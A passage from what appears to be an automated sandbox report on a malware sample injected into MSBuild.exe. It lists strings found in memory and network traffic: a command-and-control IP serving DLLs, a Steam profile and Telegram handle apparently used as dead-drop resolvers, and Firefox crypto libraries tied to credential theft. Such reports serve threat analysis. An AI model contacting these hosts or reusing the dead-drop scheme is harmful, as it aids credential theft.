                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73/ss3.dllPb
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73/vcruntime140.dll
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73/vcruntime140.dllc
                            Source: MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73BKJD
                            Source: MSBuild.exe, 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.73T
                            Source: FBFCGIDA.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                            Source: 76561199673019888[1].htm.1.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                            Source: FBFCGIDA.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: FBFCGIDA.1.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                            Source: FBFCGIDA.1.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                            Source: MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHly8&a
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=Kg_v7CMM
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=N0D1
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                            Source: MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jU8h8CqVh6FY&l=e
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                            Source: 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=BMF068jICwP9&
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                            Source: MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                            Source: FBFCGIDA.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: FBFCGIDA.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: FBFCGIDA.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://help.steampowered.com/en/
                            Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: https://mozilla.org0/
                            Source: YyIDUCFWC1.exeString found in binary or memory: https://sectigo.com/CPS0
                            Source: 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/
                            Source: MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/discussions/
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                            Source: 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199673019888
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/market/
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701548677.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1701548677.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1709833273.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.2097165559.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/badges
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/inventory/
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888;
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701548677.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1701548677.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1709833273.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888ve74rMozilla/5.0
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/s
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/workshop/
                            Source: 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/
                            Source: 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/about/
                            Source: MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/explore/
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/legal/
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/mobile
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/news/
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/points/shop/
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/stats/
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                            Source: KEHCAFHIJECGCAKFCGDBKEGIDH.1.drString found in binary or memory: https://support.mozilla.org
                            Source: KEHCAFHIJECGCAKFCGDBKEGIDH.1.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                            Source: KEHCAFHIJECGCAKFCGDBKEGIDH.1.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                            Source: MSBuild.exe, 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmp, GCBGIIEC.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                            Source: GCBGIIEC.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                            Source: MSBuild.exe, 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                            Source: MSBuild.exe, 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmp, GCBGIIEC.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                            Source: MSBuild.exe, 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17.exe
                            Source: MSBuild.exe, 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e1730.exe
                            Source: GCBGIIEC.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                            Source: YyIDUCFWC1.exeString found in binary or memory: https://system.data.sqlite.org/
                            Source: YyIDUCFWC1.exeString found in binary or memory: https://system.data.sqlite.org/X
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701548677.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1701548677.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1709833273.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/irfail
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701548677.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1701548677.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, YyIDUCFWC1.exe, 00000000.00000002.1709833273.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/irfailAt
                            Source: YyIDUCFWC1.exeString found in binary or memory: https://urn.to/r/sds_see
                            Source: YyIDUCFWC1.exeString found in binary or memory: https://urn.to/r/sds_see=isolation
                            Source: YyIDUCFWC1.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
                            Source: FBFCGIDA.1.drString found in binary or memory: https://www.ecosia.org/newtab/
                            Source: FBFCGIDA.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                            Source: KEHCAFHIJECGCAKFCGDBKEGIDH.1.drString found in binary or memory: https://www.mozilla.org
                            Source: MSBuild.exe, 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                            Source: MSBuild.exe, 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                            Source: KEHCAFHIJECGCAKFCGDBKEGIDH.1.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                            Source: MSBuild.exe, 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                            Source: MSBuild.exe, 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/HCBFHJJJEG
                            Source: KEHCAFHIJECGCAKFCGDBKEGIDH.1.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                            Source: MSBuild.exe, 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                            Source: KEHCAFHIJECGCAKFCGDBKEGIDH.1.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                            Source: KEHCAFHIJECGCAKFCGDBKEGIDH.1.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                            Source: MSBuild.exe, 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                            Source: MSBuild.exe, 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/d=enterpk2016&ui=en-us&rs=en-us&ad=us
                            Source: KEHCAFHIJECGCAKFCGDBKEGIDH.1.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                            Source: YyIDUCFWC1.exeString found in binary or memory: https://www.security.us.panasonic.com
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
